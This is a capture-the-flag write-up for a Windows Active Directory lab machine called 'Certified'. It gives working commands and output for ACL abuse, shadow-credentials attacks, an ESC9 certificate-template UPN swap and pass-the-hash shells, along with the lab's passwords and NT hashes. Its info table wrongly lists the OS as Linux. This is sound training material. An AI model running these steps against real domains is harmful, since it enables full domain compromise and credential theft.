Certified

Synopsis

Certified is a medium windows machine created by ruycr4ft. The user judith.mader has a WriteOwner permission over management group. The owner of management group is given to judith.mader and the management group has a GenericWrite permission over management_svc user which leads to shadow credentials attack. The management_svc has a GenericAll permission over ca_operator user which we can abuse to perform shadow credentials attack. The ca_operator user is member of Certificate Service DCOM Access. The CertifiedAuthentication certificate template is vulnerable to ESC9 attack which is abused to gain the administrator NT hash.

OS	Difficulty	Points	Release Date	Retired Date
Linux	Medium	30	02-11-2024	15-03-2025

The credentials are given for the following account judith.mader / judith09

---

Enumeration

Nmap

Starting the nmap scan and found Active Directory services running.

nmap -Pn -sC -sV --min-rate=1000 10.10.11.41                                                                                                             01:46:41 [53/64]
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-12 01:44 GMT                                                                                                              
Nmap scan report for 10.10.11.41                                                                                                                                             
Host is up (0.54s latency).                                                                                                                                                  
Not shown: 988 filtered tcp ports (no-response)                                                                                                                              
PORT     STATE SERVICE       VERSION                                                                                                                                         
53/tcp   open  domain        Simple DNS Plus                                                                                                                                 
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-12 08:26:59Z)                                                                                  
135/tcp  open  msrpc         Microsoft Windows RPC                                                                                                                           
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                   
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)                                                
| ssl-cert: Subject: commonName=DC01.certified.htb                                                                                                                           
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb                                                                            
| Not valid before: 2024-05-13T15:49:36                                                                                                                                      
|_Not valid after:  2025-05-13T15:49:36                                                                                                                                      
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m56s from scanner time.                                                                                                          
445/tcp  open  microsoft-ds?                                                                                                                                                 
464/tcp  open  kpasswd5?                                                                                                                                                     
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0  
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-03-12T08:28:34+00:00; +6h41m56s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)                         
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m56s from scanner time.                                                                                                          
| ssl-cert: Subject: commonName=DC01.certified.htb                                                                 
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb                                                                            
| Not valid before: 2024-05-13T15:49:36                                                                                                                                      
|_Not valid after:  2025-05-13T15:49:36  
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)                                
|_ssl-date: 2025-03-12T08:28:32+00:00; +6h41m57s from scanner time.                                                                                                          
| ssl-cert: Subject: commonName=DC01.certified.htb                                                                                                                           
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb                                                                            
| Not valid before: 2024-05-13T15:49:36                                                                                                                                      
|_Not valid after:  2025-05-13T15:49:36                                                                                                                                      
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                           
|_http-title: Not Found                                                                                                                                                      
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                  
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows                                                                                                         
                                                                                                                                                                             
Host script results:                                                                                                                                                         
| smb2-time:                                                                                                                                                                 
|   date: 2025-03-12T08:27:52                                                                                                                                                
|_  start_date: N/A                                                                                                                                                          
|_clock-skew: mean: 6h41m56s, deviation: 0s, median: 6h41m55s                                                                                                                
| smb2-security-mode:                                                                                                                                                        
|   3:1:1:                                                                                                                                                                   
|_    Message signing enabled and required                                                                                                                                   
                                                                                                                                                                             
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                               
Nmap done: 1 IP address (1 host up) scanned in 126.63 seconds 

Add certified.htb0 and DC01.certified.htb in /etc/hosts file.

SMB - judith.mader

The given credentials will give us access to SMB shares and we don't have any read permission in any of the shares.

nxc smb 10.10.11.41 -u 'judith.mader' -p 'judith09'                                 
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.

nxc smb 10.10.11.41 -u 'judith.mader' -p 'judith09' --shares
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB         10.10.11.41     445    DC01             [*] Enumerated shares
SMB         10.10.11.41     445    DC01             Share           Permissions     Remark
SMB         10.10.11.41     445    DC01             -----           -----------     ------
SMB         10.10.11.41     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.41     445    DC01             C$                              Default share
SMB         10.10.11.41     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.41     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.41     445    DC01             SYSVOL          READ            Logon server share 

Bloodhound

The given credentials is also used in LDAP. We can use nxc as bloodhound ingestor.

1

Start the neo4j database

sudo neo4j start                                                                                                                                                         
[sudo] password for dexter:                                                                                                                                                  
Directories in use:                                                                                                                                                          
home:         /usr/share/neo4j                                                                                                                                               
config:       /usr/share/neo4j/conf                                                                                                                                          
logs:         /etc/neo4j/logs                                                                                                                                                
plugins:      /usr/share/neo4j/plugins                                                                                                                                       
import:       /usr/share/neo4j/import                                                                                                                                        
data:         /etc/neo4j/data                                                                                                                                                
certificates: /usr/share/neo4j/certificates                                                                                                                                  
licenses:     /usr/share/neo4j/licenses                                                                                                                                      
run:          /var/lib/neo4j/run                                                                                                                                             
Starting Neo4j.                                                                                                                                                              
Started neo4j (pid:5167). It is available at http://localhost:7474                                                                                                           
There may be a short delay until the server is ready.

2

Run the nxc as a bloodhound ingester

nxc ldap 10.10.11.41 -u 'judith.mader' -p 'judith09' --bloodhound --collection all --dns-server 10.10.11.41
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.41     389    DC01             [+] certified.htb\judith.mader:judith09 
LDAP        10.10.11.41     389    DC01             [-] Account not found in the BloodHound database.
LDAP        10.10.11.41     389    DC01             Resolved collection methods: psremote, container, localadmin, session, dcom, rdp, acl, group, objectprops, trusts
LDAP        10.10.11.41     389    DC01             Done in 01M 24S
LDAP        10.10.11.41     389    DC01             Compressing output into /home/dexter/.nxc/logs/DC01_10.10.11.41_2025-03-12_062741_bloodhound.zip

Import the zip file into the bloodhound.

Permissions

WriteOwner: The user judith.mader has a WriteOwner permission over the management group with which we can use to set the owner of management group.

GenericWrite: The management group has a GenericWrite permission over the management_svc user with which we can modify the properties of management_svc user and perform shadow credentials attack to the NT hash.

---

Foothold

Shell - management_svc

Adding judith.mader into management group

1

Changing ownership of management group.

bloodyAD --host 'dc01.certified.htb' -d 'certified.htb' -u 'judith.mader' -p 'judith09' set owner management judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management

2

Giving WriteMembers permission.

Now the owner of management group is judith.mader, we can give the WriteMembers permission to judith.mader.

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target 'management' 'certified.htb'/'judith.mader':'judith09' 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250312-095736.bak
[*] DACL modified successfully!

3

Adding into group,

Now we will be adding judith.mader user into management group.

net rpc group addmem Management 'judith.mader' -U 'certified.htb'/'judith.mader'%'judith09' -S 'dc01.certified.htb' 

Shadow Credentials Attack

Now we can add new certificate for shadow credentials attack and retrieve NT hash of that object. More details about it, is given in the link below.

Shadow Credentials - HackTricksbook.hacktricks.wiki

1

Add new certificate.

pywhisker -d certified.htb -u 'judith.mader' -p 'judith09' --target 'management_svc' --action add
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a6bb0dbe-fdb4-3b10-bbd1-b21019d1812c
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: kr6ENKIe.pfx
[+] PFX exportiert nach: kr6ENKIe.pfx
[i] Passwort für PFX: CEuTw5XMnMn5lzMBmnx6
[+] Saved PFX (#PKCS12) certificate & key at path: kr6ENKIe.pfx
[*] Must be used with password: CEuTw5XMnMn5lzMBmnx6
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

2

Getting authentication into DC using a newly created certificate.

certipy cert -pfx kr6ENKIe.pfx -password CEuTw5XMnMn5lzMBmnx6 -export -out management_svc.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'management_svc.pfx'

3

Getting NT hash

certipy auth -pfx management_svc.pfx -u management_svc -domain certified.htb -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584

Note: If Clock skew too great error occur use ntpdate to synchronize date and time with the machine.

sudo ntpdate 10.10.11.41
2025-03-12 17:30:26.803193 (+0000) +25198.918123 +/- 0.196661 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25198.918123

Now we will get the shell as management_svc using the above NT hash via evil-winrm.

evil-winrm -i 10.10.11.41 -u 'management_svc' -H a091c1832bcdd4677c28b5a6a1295584
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> 

The use flag is present in C:\Users\\management_svc\Desktop\user.txt 👏

---

Privilege Escalation

Pillaging - managemnt_svc

Bloodhound reveals that the management_svc user has a GenericAll permission towards the ca_operator user, which give us the full control over ca_operator.

SMB - ca_operator [ Shadow Credentials Attack ]

The Shadow Credentials Attack can be performed because of GenericAll permission to retrive the NT hash.

certipy shadow auto -u 'management_svc@certified.htb' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -account ca_operator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '6e487d2d-ee15-8946-8278-792278aac63d'
[*] Adding Key Credential with device ID '6e487d2d-ee15-8946-8278-792278aac63d' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '6e487d2d-ee15-8946-8278-792278aac63d' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': 9a469a712a9d77dd66d1706b81653aee

nxc smb 10.10.11.41 -u 'ca_operator' -H 9a469a712a9d77dd66d1706b81653aee     
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\ca_operator:9a469a712a9d77dd66d1706b81653aee 

Pillaging - AD CS

Bloodhound reveals that the ca_operator is the MemberOf Certificate Service DCOM Access. It is used to manage the certificates in Active Directory.

The certify is used for enumerating and finding vulnerable certificate templates.

1

Finding vulnerable certificate templates.

certipy find -u 'ca_operator' -hashes 9a469a712a9d77dd66d1706b81653aee -dc-ip 10.10.11.41 -vulnerable 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Saved BloodHound data to '20250313021309_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250313021309_Certipy.txt'
[*] Saved JSON output to '20250313021309_Certipy.json'

2

The json file reveals that the CertifiedAuthentication template is vulnerable to ESC9.

{                                                                                                                                                                            
  "Certificate Authorities": {                                                                                                                                               
    "0": {                                                                                                                                                                   
      "CA Name": "certified-DC01-CA",                                                                                                                                        
      "DNS Name": "DC01.certified.htb",                                                                                                                                      
      "Certificate Subject": "CN=certified-DC01-CA, DC=certified, DC=htb",                                                                                                   
      "Certificate Serial Number": "36472F2C180FBB9B4983AD4D60CD5A9D",                                                                                                       
      "Certificate Validity Start": "2024-05-13 15:33:41+00:00",                                                                                                             
      "Certificate Validity End": "2124-05-13 15:43:41+00:00",                                                                                                               
      "Web Enrollment": "Disabled",                                                                                                                                          
      "User Specified SAN": "Disabled",                                                                                                                                      
      "Request Disposition": "Issue",                                                                                                                                        
      "Enforce Encryption for Requests": "Enabled",                                                                                                                          
      "Permissions": {                                                                                                                                                       
        "Owner": "CERTIFIED.HTB\\Administrators",                                                                                                                            
        "Access Rights": {                                                                                                                                                   
          "2": [                                                                                                                                                             
            "CERTIFIED.HTB\\Administrators",                                                                                                                                 
            "CERTIFIED.HTB\\Domain Admins",                                                                                                                                  
            "CERTIFIED.HTB\\Enterprise Admins"                                                                                                                               
          ],                                                                                                                                                                 
          "1": [                                                                                                                                                             
            "CERTIFIED.HTB\\Administrators",                                                                                                                                 
            "CERTIFIED.HTB\\Domain Admins",                                                                                                                                  
            "CERTIFIED.HTB\\Enterprise Admins"                                                                                                                               
          ],                                                                                                                                                                 
          "512": [                                                                                                                                                           
            "CERTIFIED.HTB\\Authenticated Users"                                                                                                                             
          ]
        }
      }
    }
  },
  "Certificate Templates": {
    "0": {
      "Template Name": "CertifiedAuthentication",
      "Display Name": "Certified Authentication",
      "Certificate Authorities": [
        "certified-DC01-CA"
      ],
      "Enabled": true,
      "Client Authentication": true,
      "Enrollment Agent": false,
      "Any Purpose": false,
      "Enrollee Supplies Subject": false,
      "Certificate Name Flag": [
        "SubjectRequireDirectoryPath",
        "SubjectAltRequireUpn"
      ],
      "Enrollment Flag": [
        "NoSecurityExtension",
        "AutoEnrollment",
        "PublishToDs"
      ],
      "Private Key Flag": [
        "16842752"
      ],
      "Extended Key Usage": [
        "Server Authentication",
        "Client Authentication"
      ],
      "Requires Manager Approval": false,
      "Requires Key Archival": false,
      "Authorized Signatures Required": 0,
      "Validity Period": "1000 years",
      "Renewal Period": "6 weeks",
      "Minimum RSA Key Length": 2048,
      "Permissions": {
        "Enrollment Permissions": {
          "Enrollment Rights": [
            "CERTIFIED.HTB\\operator ca",
            "CERTIFIED.HTB\\Domain Admins", 
            "CERTIFIED.HTB\\Enterprise Admins"
]
        },
        "Object Control Permissions": {
          "Owner": "CERTIFIED.HTB\\Administrator",
          "Write Owner Principals": [
            "CERTIFIED.HTB\\Domain Admins", 
            "CERTIFIED.HTB\\Enterprise Admins",
            "CERTIFIED.HTB\\Administrator"
          ],
          "Write Dacl Principals": [
            "CERTIFIED.HTB\\Domain Admins", 
            "CERTIFIED.HTB\\Enterprise Admins",
            "CERTIFIED.HTB\\Administrator"
          ],
          "Write Property Principals": [
            "CERTIFIED.HTB\\Domain Admins", 
            "CERTIFIED.HTB\\Enterprise Admins",
            "CERTIFIED.HTB\\Administrator"
          ]
        }
      },
      "[!] Vulnerabilities": {
        "ESC9": "'CERTIFIED.HTB\\\\operator ca' can enroll and template has no security extension"
      }
    }
  }
}   

Shell - Administrator [ ESC9 Attack ]

ESC9 is a vulnerability in Active Directory Certificate Services (AD CS) where the StrongCertificateBindingEnforcement key is not set to 2 or includes the UPN flag. The details about ESC9 is given in hacktricks. The link is given below.

AD CS Domain Escalation - HackTricksbook.hacktricks.wiki

1

Changing userPrincipalName

The userPrincipalName has to be changed from ca_operator to administrator.

certipy account update -u "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator -debug 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CERTIFIED.HTB' at '1.1.1.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.41:636 - ssl
[+] Default path: DC=certified,DC=htb
[+] Configuration path: CN=Configuration,DC=certified,DC=htb
[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

2

Request the certificate

Requesting the CertifiedAuthentication certificate.

certipy req -u 'ca_operator' -hashes 9a469a712a9d77dd66d1706b81653aee -target 'DC01.certified.htb' -ca 'certified-DC01-CA' -ns 10.10.11.41 -dc-ip 10.10.11.41 -template CertifiedAuthentication -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'DC01.certified.htb' at '10.10.11.41'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

3

Restoring the UPN

Change the UPN from Administrator to ca_operator.

certipy account update -u "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'CERTIFIED.HTB' at '1.1.1.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.41:636 - ssl
[+] Default path: DC=certified,DC=htb
[+] Configuration path: CN=Configuration,DC=certified,DC=htb
[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'

4

Getting NT hash

certipy auth -pfx administrator.pfx -domain 'certified.htb'                                                                                              
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

evil-winrm -i 10.10.11.41 -u 'Administrator' -H 0d5b49608bbce1751f708748f67e2d34
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

The root flag is present in C:\Users\Administrator\Desktop\root.txt 🎉

---

Proof of Concept

The below video provides the PoC of Certified machine.